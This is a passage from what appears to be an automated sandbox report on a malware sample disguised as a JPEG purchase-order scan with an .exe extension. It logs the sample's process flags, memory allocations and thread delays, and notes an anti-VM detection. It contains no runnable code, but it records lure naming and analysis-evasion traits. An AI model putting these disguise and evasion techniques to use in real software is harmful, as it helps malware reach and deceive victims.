                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HJnkiZjAPsec.exe PID: 7260, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 17C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 94A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: A4A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: A6B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: B6B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: C1D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: D1D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: E1D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 11A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 9AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 9CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: ACB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: B790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: C790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 29A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 2BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeMemory allocated: 4BA0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599883Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599213Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598889Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598170Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597937Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597609Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597136Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 597030Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596878Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596753Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596345Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594481Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594374Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 594155Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599327
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598375
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598265
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598155
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597858
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597749
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597640
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597531
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597421
